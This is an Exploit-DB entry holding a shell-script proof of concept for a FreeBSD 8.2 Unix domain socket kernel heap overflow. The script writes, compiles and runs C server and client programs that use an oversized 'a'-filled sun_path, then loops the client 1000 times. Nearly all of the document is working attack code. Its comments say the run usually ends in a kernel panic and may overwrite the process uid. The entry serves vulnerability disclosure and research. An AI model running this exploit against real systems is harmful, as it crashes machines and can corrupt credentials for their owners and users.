FreeBSD - UIPC socket heap Overflow (PoC)

EDB-ID:

17908


Type:

dos


Platform:

FreeBSD

Date:

2011-09-30


#!/bin/sh
#
# fbsd-uipcsock-heap.sh, by Shaun Colley <scolley@ioactive.com>, 29/09/11
#
# proof-of-concept crash for the freebsd unix domain sockets heap
# overflow.  this was tested on freebsd 8.2-RELEASE.  just a PoC for now.
#
# see advisory & patches for details:
# http://www.securityfocus.com/archive/1/519864/30/0/threaded
#
# this PoC will usually result in a kernel panic with a read access
# violation at 0x616161XX but sometimes the kernel will not crash straight
# away (particularly if you shorten the length of 'sun_path' -- try 140 bytes),
# and your uid (see output of `id`) may have been modified to the
# decimal equivalent of 0x61616161 during the heap smash 

# write server code to srv.c 
cat > srv.c << _EOF
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/types.h>
#include <unistd.h>
#include <string.h>

struct socky {
  short sun_family;
  char sun_path[160];
};

int connhandler(int incoming) 
{
  char buffer[256];
  int n = 0;

  n = read(incoming, buffer, 256);
  buffer[n] = 0;

  printf("%s\n", buffer);
  n = sprintf(buffer, "fbsd uipc socket heap overflow");
  write(incoming, buffer, n);
 
  close(incoming);
  return 0;
}

int main(void)
{
  struct socky overfl0w;
  int sock, incoming; 
  socklen_t alen;
  pid_t child;
  char buf[160];
 
  sock = socket(PF_UNIX, SOCK_STREAM, 0);
  if(sock < 0)
    {
      printf("socket() failed!\n");
      return 1;
    } 

  memset(&overfl0w, 0, sizeof(struct socky));

  overfl0w.sun_family = AF_UNIX;
  memset(buf, 0x61, sizeof(buf));
  buf[sizeof(buf)-1] = 0x00;
  strcpy(overfl0w.sun_path, buf);

  if(bind(sock, (struct sockaddr *)&overfl0w, 
	  sizeof(struct socky)) != 0)
    {
      printf("bind() failed!\n");
      return 1;
    }

  if(listen(sock, 5) != 0)
    {
      printf("listen() failed!\n");
      return 1;
    }

  while((incoming = accept(sock, (struct sockaddr *)&overfl0w, &alen)) > -1) 
    {
      child = fork();
      if(child == 0)
	{
	  return connhandler(incoming);
	}
      close(incoming);
    }

  close(sock);
  return 0;
}
_EOF

gcc srv.c -o srv

# write the client code to client.c
cat > client.c << _EOF
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <string.h>

struct socky {
  short sun_family;
  char sun_path[160];
};

int main(void)
{
  struct socky overfl0w;
  int  sock, n;
  char buffer[256], buf[160];

  sock = socket(PF_UNIX, SOCK_STREAM, 0);
  if(sock < 0)
    {
      printf("socket() failed!\n");
      return 1;
    }

  /* start with a clean address structure */
  memset(&overfl0w, 0, sizeof(struct sockaddr_un));
 
  overfl0w.sun_family = AF_UNIX;
  memset(buf, 0x61, sizeof(buf));
  buf[sizeof(buf)-1] = 0x00;
  strcpy(overfl0w.sun_path, buf);

  if(connect(sock, 
	     (struct sockaddr *)&overfl0w, 
	     sizeof(struct socky)) != 0)
    {
      printf("connect() failed!\n");
      return 1;
    }

  n = snprintf(buffer, 256, "panic");
  write(sock, buffer, n);
 
  n = read(sock, buffer, 256);
  buffer[n] = 0;

  printf("%s\n", buffer);

  close(sock);
  return 0;
}
_EOF

gcc client.c -o client

# crash doesn't happen straight away, so loop the client to speed it up
cat > loop.c << _EOF
#include <stdio.h>

int main() {
int i;
for(i = 0; i < 1000; i++) {
system("./client");
}
}
_EOF

gcc loop.c -o loop

./srv &
./loop